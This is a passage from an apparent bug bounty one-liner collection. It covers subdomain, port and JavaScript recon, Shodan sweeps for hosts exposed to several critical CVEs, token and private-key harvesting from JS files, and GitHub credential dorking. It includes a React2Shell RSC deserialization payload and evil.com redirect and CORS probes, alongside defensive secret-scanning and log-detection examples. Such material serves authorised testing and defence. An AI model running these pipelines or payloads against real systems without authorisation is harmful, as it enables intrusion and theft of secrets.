    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 New Oneliners 2026

⚡🔥⚡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - CRITICAL) ⚡🔥⚡

💀 Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV 💀

⚡ Detect n8n Instances (Shodan/Censys)

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

⚡ Fingerprint n8n Installations

cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

⚡ Check Vulnerable Webhook Endpoints

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

⚡ Content-Type Confusion Detection

curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

⚡ Mass n8n Version Detection

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txt

⚡ Nuclei Template Check for CVE-2026-21858

nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Affected: n8n < 1.121.0 | ✅ Fix: Update to n8n 1.121.0+


⚡🔥⚡ N8n Auth RCE - CVE-2026-21877 (CVSS 10.0 - CRITICAL) ⚡🔥⚡

💀 Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected! 💀

⚡ Detect Git Node Enabled Instances

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

⚡ Check n8n Authentication Endpoints

cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Affected: n8n < 1.121.3 | ✅ Fix: Update to n8n 1.121.3+


⚡🔥⚡ D-Link DSL RCE - CVE-2026-0625 (CVSS 9.3 - CRITICAL) ⚡🔥⚡

💀 Command Injection in Legacy D-Link DSL Routers - Under active exploitation! 💀

⚡ Shodan Dork for D-Link DSL Routers

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

⚡ Detect Vulnerable dnscfg.cgi Endpoint

cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

⚡ Mass D-Link Fingerprint

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

⚠️ Affected: Legacy D-Link DSL Gateway Routers (EOL) | ✅ Fix: Replace with supported devices


⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRITICAL) ⚡🔥⚡

💀 RCE via Postgres Parameter Injection in Veeam Backup & Replication 💀

⚡ Detect Veeam Backup Servers

shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

⚡ Fingerprint Veeam Instances

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

⚠️ Affected: Veeam B&R 13.0.1.180 and earlier | ✅ Fix: Update to 13.0.1.1071+


⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (HIGH SEVERITY) ⚡🔥⚡

💀 Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible 💀

⚡ Find Grafana Instances

shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

⚡ Detect Grafana Version

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txt

⚡ Check Open Redirect (CVE-2025-4123 vector)

cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

⚡ Mass Grafana Login Page Detection

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

⚠️ Affected: Multiple Grafana versions | ✅ Fix: Update to latest patched version


⚡🔥⚡ CVE-2026 Subdomain Hunting - Mass Detection Pipeline ⚡🔥⚡

💀 10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale! 💀

⚡ 1. Full Subdomain CVE-2026 Hunt Pipeline (n8n + Grafana + D-Link)

subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

⚡ 2. Mass n8n CVE-2026-21858 Detection on Subdomains

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

⚡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner

cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

⚡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Subdomain Hunt

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

⚡ 5. Multi-CVE-2026 Scanner with Nuclei (Parallel Templates)

subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

⚡ 6. Subdomain n8n Webhook Fingerprint + CVE-2026-21858 Check

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

⚡ 7. CVE-2026 IoT/Router Hunt (D-Link DSL + Other Routers)

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

⚡ 8. Veeam CVE-2025-59470 Subdomain Detection

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

⚡ 9. Combined CVE-2026 Fingerprint + Version Extractor

subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.tech != null) | "\(.url) \(.tech[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

⚡ 10. Full CVE-2026 Recon Automation Script

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

🎯 Pro Tip: Combine with notify to get real-time alerts: ... | notify -silent -provider slack


⚡🔥⚡ Advanced Reconnaissance Pipeline - 2026 Edition ⚡🔥⚡

🎯 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! 🎯

⚡ 1. Multi-Source Subdomain Discovery + Tech Fingerprinting

subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Combines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting

⚡ 2. ASN Enumeration + Reverse DNS Discovery

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '$1 ~ /^[0-9]+$/ {print "AS"$1}' | sort -u | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

Discovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains

⚡ 3. URL Discovery Pipeline (Wayback + GAU + Katana)

cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Parallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication

⚡ 4. JavaScript Deep Analysis + Secret Scanner

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

Finds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints

⚡ 5. Certificate Transparency + Subdomain Permutation Attack

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

CT logs enumeration + intelligent permutation (api → api-dev, api-staging) with mass DNS resolution

⚡ 6. Port Discovery + Web Services on Non-Standard Ports

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

Fast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)

⚡ 7. GitHub Dorking Automation for Target Organization

ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Automated GitHub dorking for secrets, credentials and sensitive data exposure

⚡ 8. Cloud Storage Discovery (S3 + Azure + GCP)

cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'

Extracts and validates misconfigured cloud storage buckets from collected URLs

⚡ 9. Parameter Discovery + Vulnerability Pattern Matching

cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)

⚡ 10. Continuous Recon Monitor (Cron-Ready)

DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

Full persistent recon pipeline - detects new assets daily and sends notifications

🎯 Pro Tip: Run oneliner #10 via cron for 24/7 monitoring: 0 */6 * * * /path/to/recon_monitor.sh


⚡🔥⚡ JavaScript Endpoint Extraction - Elite Techniques 2026 ⚡🔥⚡

🎯 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! 🎯

⚡ 1. Mass JS File Discovery + Download Pipeline

mkdir -p js_downloaded && cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '{gsub(/[\[\]]/, "", $NF); if ($NF + 0 > 500) print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis

⚡ 2. Extract All API Endpoints from JS Files

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

Extracts all relative API paths from JavaScript, filters static assets

⚡ 3. AWS Keys Hunter in JS Files

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Hunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)

⚡ 4. Google API Keys + Firebase URLs Extractor

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

Extracts Google API keys and Firebase database/app URLs

⚡ 5. S3 Bucket Discovery in JavaScript

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Finds S3 buckets in JS and validates accessibility

⚡ 6. Internal IP Addresses Leakage

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

Discovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)

⚡ 7. Slack Webhooks + Discord Tokens in JS

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z0-9]{23,}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extracts Slack webhook URLs and Discord bot tokens

⚡ 8. GitHub Tokens + Private Keys Detection

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

Finds GitHub personal access tokens (all formats) and private key headers

⚡ 9. Email Addresses + Hidden Subdomains in JS

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extracts email addresses and hidden subdomains referenced in JavaScript

⚡ 10. Full JS Recon Pipeline (All-in-One)

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '\"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints

🎯 Pro Tip: Use nuclei -t exposures/tokens/ on discovered secrets to validate if they're active!
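The one-liners in this section each run a single grep over live JS files. As an added example (not code from the KingOfBugBountyTips repo), the same patterns are collected below into one offline pass you can run against your own build output before it ships, which is where these leaks are cheapest to catch; SAMPLE_JS is constructed and every value in it is a dummy.

```python
"""Scan JavaScript bundles for the secret and endpoint patterns used above.

Added example, not code from the KingOfBugBountyTips repo. SAMPLE_JS is
constructed; every key in it is a dummy value.
"""
import re
from typing import Dict, List

PATTERNS = {
    "aws_access_key": re.compile(r"\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "firebase_host": re.compile(r"[a-z0-9-]+\.firebase(?:io|app)\.com"),
    "s3_bucket": re.compile(r"[A-Za-z0-9_-]+\.s3(?:\.[a-z0-9-]+)?\.amazonaws\.com"),
    "slack_webhook": re.compile(r"https://hooks\.slack\.com/services/[A-Za-z0-9/]+"),
    "discord_token": re.compile(r"[MN][A-Za-z0-9]{23,}\.[\w-]{6}\.[\w-]{27}"),
    "github_token": re.compile(
        r"\b(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36}\b"
        r"|github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "internal_ip": re.compile(
        r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
        r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
        r"|192\.168\.\d{1,3}\.\d{1,3})\b"),
}
# Quoted relative paths, minus static assets (same filter as one-liner 2 above).
ENDPOINT = re.compile(r"""["'](/[A-Za-z0-9_./-]+)["']""")
STATIC_EXT = (".css", ".png", ".jpg", ".svg", ".gif", ".woff", ".ico")

# Constructed sample bundle; the AWS id is the example value from AWS docs.
SAMPLE_JS = "\n".join([
    'const API = "/api/v1/users";',
    'const FB = "https://demo-app-1234.firebaseio.com";',
    'const GKEY = "AIzaSyA' + "0" * 32 + '";',
    'const AWS_KEY = "AKIAIOSFODNN7EXAMPLE";',
    'const HOOK = "https://hooks.slack.com/services/T000/B000/XXXX";',
    'fetch("http://10.0.12.5:8080/health");',
    'const css = "/static/app.css";',
])


def scan_js(source: str) -> Dict[str, List[str]]:
    """Return {category: sorted unique matches} for one JS file's text."""
    found: Dict[str, List[str]] = {}
    for name, rx in PATTERNS.items():
        hits = sorted(set(rx.findall(source)))
        if hits:
            found[name] = hits
    endpoints = sorted({p for p in ENDPOINT.findall(source)
                        if not p.lower().endswith(STATIC_EXT)})
    if endpoints:
        found["endpoint"] = endpoints
    return found


def has_secrets(report: Dict[str, List[str]]) -> bool:
    """CI gate: True when a credential (not just a path or host name) was found."""
    informational = ("endpoint", "internal_ip", "firebase_host", "s3_bucket")
    return any(category not in informational for category in report)


if __name__ == "__main__":
    report = scan_js(SAMPLE_JS)
    for category, hits in report.items():
        print(f"{category:16s} {hits}")
    print("block deploy:", has_secrets(report))
```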


🆕 Oneliners 2024-2025

⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRITICAL) ⚡🔥⚡

💀 Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV 💀

⚡ Detect Next.js Apps (Recon First)

cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Check if Next-Action Header is Accepted

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

⚡ Mass Detection - Next-Action Header Accepted

cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Create Payload Files for Testing

# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

⚡ Manual Vulnerability Check with cURL

curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ One-liner: Full Detection Pipeline

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

⚡ Detect Vulnerable Response Headers

cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Mass Scan with httpx + Next-Action Probe

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

⚡ Shodan Dork for Next.js Targets

shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Nuclei Template Check

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

⚡ Find & Test - Complete One-liner

subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Check RSC Endpoint Directly

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

⚡ Batch Test from File with Parallel

cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: Update to React 19.0.1/19.1.2/19.2.1

🎯 Key Detection: Apps accepting Next-Action header + RSC deserialization = Potential RCE
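Seen from the other side, the probes in this section have a recognisable shape: a POST carrying a `Next-Action` header with a free-form value ("test", "x", "probe") and a body of `0`, or a multipart body containing the `$1:__proto__` / `"$@0"` structure from payload.json. As an added example (not code from the KingOfBugBountyTips repo), the detection below runs that logic over constructed request-log lines; it assumes a reverse proxy that logs one JSON object per request with method, path, source, selected headers and a body prefix (field names are this example's own), and it treats a non-hex action id as a probe on the assumption that production Next.js action ids are hex digests.

```python
"""Flag CVE-2025-55182 (React2Shell) probes in request logs.

Added example, not code from the KingOfBugBountyTips repo. Field names and
sample entries are constructed.
"""
import json
import re
from typing import Dict, List, Optional, Tuple

# Assumption: production Next.js server-action ids are long hex digests,
# whereas the probes on this page send free-form values ("test", "x", "probe").
HEX_ACTION_ID = re.compile(r"^[0-9a-f]{40,}$")

# Fragments of the page's "safe math check" payload.json and trigger.txt.
PAYLOAD_MARKERS = ("$1:__proto__", "constructor:constructor", '"$@0"', "$B0")

SAMPLE_LOG = [json.dumps(e) for e in (
    {"src": "203.0.113.7", "method": "POST", "path": "/",
     "headers": {"Next-Action": "test", "Content-Type": "text/plain"}, "body_prefix": "0"},
    {"src": "203.0.113.7", "method": "POST", "path": "/login",
     "headers": {"Next-Action": "x", "Content-Type": "text/plain"}, "body_prefix": "0"},
    {"src": "203.0.113.7", "method": "POST", "path": "/api",
     "headers": {"next-action": "probe"}, "body_prefix": "0"},
    {"src": "198.51.100.9", "method": "POST", "path": "/",
     "headers": {"Next-Action": "check",
                 "Content-Type": "multipart/form-data; boundary=----x"},
     "body_prefix": '------x\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
                    '{"then":"$1:__proto__:then","status":"resolved_model"'},
    # Legitimate server action: hex id, JSON-encoded argument array.
    {"src": "192.0.2.44", "method": "POST", "path": "/dashboard",
     "headers": {"Next-Action": "0123456789abcdef0123456789abcdef01234567",
                 "Content-Type": "text/plain"}, "body_prefix": '["abc"]'},
    {"src": "192.0.2.44", "method": "GET", "path": "/", "headers": {}, "body_prefix": ""},
)]


def classify(entry: dict) -> Optional[str]:
    """Return None, "probe" or "exploit-attempt" for one parsed log entry."""
    if entry.get("method") != "POST":
        return None
    headers = {k.lower(): v for k, v in entry.get("headers", {}).items()}
    action = headers.get("next-action")
    if action is None:
        return None                      # not a server-action call at all
    body = entry.get("body_prefix", "")
    if any(marker in body for marker in PAYLOAD_MARKERS):
        return "exploit-attempt"         # RSC payload structure from this section
    if not HEX_ACTION_ID.match(action):
        return "probe"                   # "is Next-Action accepted" style request
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Parse JSON lines and collect (src, path, verdict) for flagged requests."""
    findings = []
    for raw in lines:
        try:
            entry = json.loads(raw)
        except ValueError:
            continue                     # skip malformed lines
        verdict = classify(entry)
        if verdict:
            findings.append((entry.get("src", "?"), entry.get("path", "?"), verdict))
    return findings


def noisy_sources(findings: List[Tuple[str, str, str]], min_paths: int = 3) -> List[str]:
    """Sources that probed several distinct paths: the mass-scan pattern above."""
    by_src: Dict[str, set] = {}
    for src, path, _ in findings:
        by_src.setdefault(src, set()).add(path)
    return sorted(s for s, paths in by_src.items() if len(paths) >= min_paths)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for src, path, verdict in results:
        print(f"{verdict:16s} {src:15s} {path}")
    print("mass-scan sources:", noisy_sources(results))
```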


Nuclei DAST XSS

echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

CORS Misconfiguration

cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

